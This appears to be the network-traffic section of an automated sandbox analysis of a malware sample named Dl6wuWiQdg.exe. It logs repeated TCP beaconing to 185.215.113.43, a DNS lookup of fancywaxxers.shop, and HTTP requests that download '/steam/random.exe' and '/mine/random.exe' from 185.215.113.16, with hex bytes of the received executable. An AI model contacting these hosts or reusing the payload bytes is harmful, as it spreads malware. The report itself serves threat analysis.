Dec 31, 2024 09:49:29.999681950 CET	50005	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:30.004417896 CET	80	50005	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:30.732076883 CET	80	50005	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:30.732132912 CET	50005	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:32.243187904 CET	50005	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:32.243474007 CET	50006	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:32.248322964 CET	80	50005	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:32.248338938 CET	80	50006	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:32.248439074 CET	50005	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:32.248481035 CET	50006	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:32.248677015 CET	50006	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:32.253451109 CET	80	50006	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:32.953929901 CET	80	50006	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:32.954032898 CET	50006	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:34.585860968 CET	50006	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:34.586236000 CET	50008	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:34.590917110 CET	80	50006	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:34.591017962 CET	80	50008	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:34.591125011 CET	50006	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:34.591161013 CET	50008	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:34.591372967 CET	50008	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:34.596092939 CET	80	50008	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:35.300867081 CET	80	50008	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:35.301034927 CET	50008	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:36.803946972 CET	50008	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:36.804296970 CET	50009	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:36.808984995 CET	80	50008	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:36.809091091 CET	50008	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:36.809108019 CET	80	50009	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:36.809178114 CET	50009	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:36.809385061 CET	50009	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:36.814218044 CET	80	50009	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:37.515782118 CET	80	50009	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:37.515933037 CET	50009	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:39.408668995 CET	50009	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:39.408977985 CET	50010	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:39.413634062 CET	80	50009	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:39.413690090 CET	50009	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:39.413798094 CET	80	50010	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:39.413852930 CET	50010	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:39.417922020 CET	50010	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:39.422724009 CET	80	50010	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:40.111429930 CET	80	50010	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:40.111493111 CET	50010	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:41.616367102 CET	50010	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:41.616736889 CET	50011	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:41.621388912 CET	80	50010	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:41.621447086 CET	50010	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:41.621526957 CET	80	50011	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:41.621588945 CET	50011	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:41.621727943 CET	50011	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:41.626560926 CET	80	50011	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:43.812731981 CET	80	50011	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:43.812829018 CET	50011	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:45.446687937 CET	50011	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:45.447038889 CET	50012	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:45.451855898 CET	80	50011	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:45.451935053 CET	80	50012	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:45.451941967 CET	50011	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:45.452013969 CET	50012	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:45.452210903 CET	50012	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:45.457031965 CET	80	50012	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:46.158930063 CET	80	50012	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:46.159048080 CET	50012	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:47.663224936 CET	50012	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:47.663578987 CET	50013	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:47.668330908 CET	80	50012	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:47.668407917 CET	50012	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:47.668420076 CET	80	50013	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:47.668493032 CET	50013	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:47.668617964 CET	50013	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:47.673362017 CET	80	50013	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:48.382879972 CET	80	50013	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:48.382993937 CET	50013	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:50.006860971 CET	50013	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:50.007184982 CET	50014	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:50.011856079 CET	80	50013	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:50.011936903 CET	50013	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:50.011970997 CET	80	50014	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:50.012046099 CET	50014	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:50.012197971 CET	50014	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:50.016988993 CET	80	50014	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:50.720453978 CET	80	50014	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:50.720570087 CET	50014	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:52.256234884 CET	50014	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:52.261195898 CET	80	50014	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:52.261251926 CET	50014	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:52.305078030 CET	50015	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:52.309946060 CET	80	50015	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:52.310029984 CET	50015	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:52.329287052 CET	50015	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:52.334078074 CET	80	50015	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:53.044357061 CET	80	50015	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:53.044447899 CET	50015	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:54.670578957 CET	50015	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:54.671076059 CET	50016	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:54.675668955 CET	80	50015	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:54.675750971 CET	50015	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:54.675920963 CET	80	50016	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:54.675997019 CET	50016	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:54.678767920 CET	50016	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:54.683582067 CET	80	50016	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:55.376422882 CET	80	50016	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:55.376584053 CET	50016	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:56.882219076 CET	50016	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:56.882546902 CET	50017	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:56.887270927 CET	80	50016	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:56.887350082 CET	80	50017	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:56.887444019 CET	50016	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:56.887481928 CET	50017	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:56.887685061 CET	50017	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:56.892537117 CET	80	50017	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:57.603605032 CET	80	50017	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:57.603699923 CET	50017	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:59.225644112 CET	50017	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:59.226130962 CET	50018	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:59.230861902 CET	80	50017	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:59.230922937 CET	80	50018	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:59.230931044 CET	50017	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:59.231012106 CET	50018	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:59.231152058 CET	50018	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:49:59.235925913 CET	80	50018	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:59.931427956 CET	80	50018	185.215.113.43	192.168.2.6
Dec 31, 2024 09:49:59.931524038 CET	50018	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:01.446271896 CET	50018	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:01.446531057 CET	50020	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:01.451323986 CET	80	50018	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:01.451349974 CET	80	50020	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:01.451442003 CET	50020	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:01.451512098 CET	50018	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:01.451570988 CET	50020	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:01.456300020 CET	80	50020	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:03.455797911 CET	80	50020	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:03.455863953 CET	50020	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:05.088530064 CET	50020	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:05.089061022 CET	50021	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:05.094129086 CET	80	50020	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:05.094187021 CET	50020	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:05.095309973 CET	80	50021	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:05.095379114 CET	50021	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:05.095500946 CET	50021	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:05.101522923 CET	80	50021	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:05.803459883 CET	80	50021	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:05.803529978 CET	50021	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:07.322361946 CET	50021	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:07.322814941 CET	50022	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:07.327375889 CET	80	50021	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:07.327425003 CET	50021	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:07.327646017 CET	80	50022	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:07.327718973 CET	50022	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:07.328083038 CET	50022	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:07.332840919 CET	80	50022	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:08.025239944 CET	80	50022	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:08.025372982 CET	50022	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:09.672997952 CET	50022	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:09.673360109 CET	50023	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:09.678090096 CET	80	50022	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:09.678145885 CET	50022	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:09.678240061 CET	80	50023	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:09.678431988 CET	50023	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:09.679383993 CET	50023	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:09.684139013 CET	80	50023	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:10.413489103 CET	80	50023	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:10.413542032 CET	50023	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:11.931349993 CET	50023	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:11.931966066 CET	50024	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:11.936928988 CET	80	50023	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:11.936954975 CET	80	50024	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:11.936999083 CET	50023	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:11.937047958 CET	50024	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:11.937598944 CET	50024	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:11.942433119 CET	80	50024	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:12.654110909 CET	80	50024	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:12.654192924 CET	50024	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:14.275098085 CET	50024	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:14.275470018 CET	50025	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:14.280323029 CET	80	50025	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:14.280566931 CET	50025	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:14.280780077 CET	50025	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:14.282596111 CET	80	50024	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:14.282665014 CET	50024	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:14.285561085 CET	80	50025	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:14.313033104 CET	50025	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:15.862013102 CET	50026	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:15.866996050 CET	80	50026	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:15.867086887 CET	50026	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:15.867229939 CET	50026	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:15.872101068 CET	80	50026	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:17.101953983 CET	80	50026	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:17.102010965 CET	50026	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:18.730017900 CET	50026	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:18.730318069 CET	50027	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:18.735205889 CET	80	50027	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:18.735220909 CET	80	50026	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:18.735270977 CET	50027	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:18.735296965 CET	50026	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:18.735858917 CET	50027	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:18.740705013 CET	80	50027	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:19.435967922 CET	80	50027	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:19.436151028 CET	50027	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:20.947165012 CET	50027	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:20.947523117 CET	50028	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:20.952203989 CET	80	50027	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:20.952302933 CET	80	50028	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:20.952348948 CET	50027	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:20.952380896 CET	50028	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:20.952583075 CET	50028	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:20.957340956 CET	80	50028	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:23.037642956 CET	80	50028	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:23.037946939 CET	50028	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:24.665879965 CET	50028	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:24.666158915 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:24.670825005 CET	80	50028	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:24.670896053 CET	50028	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:24.670918941 CET	80	50029	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:24.671329021 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:24.671529055 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:24.676301003 CET	80	50029	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:26.071680069 CET	80	50029	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:26.071702003 CET	80	50029	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:26.071726084 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:26.071734905 CET	80	50029	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:26.071748018 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:26.071773052 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:27.592341900 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:27.592653990 CET	50030	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:27.597285986 CET	80	50029	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:27.597400904 CET	80	50030	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:27.597448111 CET	50029	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:27.597486019 CET	50030	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:27.598668098 CET	50030	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:27.603415012 CET	80	50030	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:28.307413101 CET	80	50030	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:28.307529926 CET	50030	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:29.936311960 CET	50030	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:29.936929941 CET	50031	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:29.941406012 CET	80	50030	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:29.941453934 CET	50030	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:29.941898108 CET	80	50031	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:29.941950083 CET	50031	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:29.942589045 CET	50031	80	192.168.2.6	185.215.113.43
Dec 31, 2024 09:50:29.947385073 CET	80	50031	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:30.632594109 CET	80	50031	185.215.113.43	192.168.2.6
Dec 31, 2024 09:50:30.635127068 CET	50031	80	192.168.2.6	185.215.113.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:48:27.818762064 CET	49371	53	192.168.2.6	1.1.1.1
Dec 31, 2024 09:48:27.831734896 CET	53	49371	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 09:48:27.818762064 CET	192.168.2.6	1.1.1.1	0x3d8a	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 09:48:27.831734896 CET	1.1.1.1	192.168.2.6	0x3d8a	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

185.215.113.16

185.215.113.43

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49748	185.215.113.16	80	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:48:39.130386114 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49754	185.215.113.16	80	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:48:39.780358076 CET	204	OUT	GET /mine/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 31, 2024 09:48:40.472445011 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 31 Dec 2024 08:48:39 GMT Content-Type: application/octet-stream Content-Length: 3243520 Last-Modified: Tue, 31 Dec 2024 08:37:28 GMT Connection: keep-alive ETag: "6773ad48-317e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf1@1~1@Wk4o1n1 @.rsrc@.idata @tezivoqu**@tcaewlrxp1X1@.taggant01"\1@
Dec 31, 2024 09:48:40.472482920 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 31, 2024 09:48:40.472491980 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 31, 2024 09:48:40.472507954 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 31, 2024 09:48:40.472518921 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 31, 2024 09:48:40.472528934 CET	672	IN	Data Raw: e5 62 b2 e7 96 82 97 25 7c ce 74 cc 7e e6 48 97 81 a2 f0 4f 6f 25 f6 e7 36 25 35 a3 80 4c cd cf 79 63 b2 e7 96 8e ee 25 7c ce 54 cc 7e e6 48 77 80 a2 f0 4f 4f 24 f6 e7 36 25 35 a3 80 4c e9 cf 71 63 b2 e7 96 32 e0 25 7c ce b4 cc 7e e6 48 57 80 a2 Data Ascii: b%\|t~HOo%6%5Lyc%\|T~HwOO$6%5Lqc2%\|~HWO$6%5Lec%\|~H7O$6%5Lc%\|~HO$6%5Lc%\|~HO$6%5L9c%\|4~HO/$6%5Lcr%\|~H
Dec 31, 2024 09:48:40.472538948 CET	1236	IN	Data Raw: 5d 63 b2 e7 96 5a 97 25 7c ce d4 c8 7e e6 48 f7 a9 a2 f0 4f cf 26 f6 e7 36 25 35 a3 80 4c fd cf a5 63 b2 e7 96 52 e0 25 7c ce 34 c9 7e e6 48 d7 a9 a2 f0 4f 2f 26 f6 e7 36 25 35 a3 80 4c fd cf 4d 63 b2 e7 96 be ee 25 7c ce 14 c9 7e e6 48 b7 a8 a2 Data Ascii: ]cZ%\|~HO&6%5LcR%\|4~HO/&6%5LMc%\|~HO&6%5LUcB%\|t~HOo&6%5L}`:%\|T~HwOO6%5LA`n%\|~HWO6%5Lq`%\|~H7O6%5La`"%\|~H
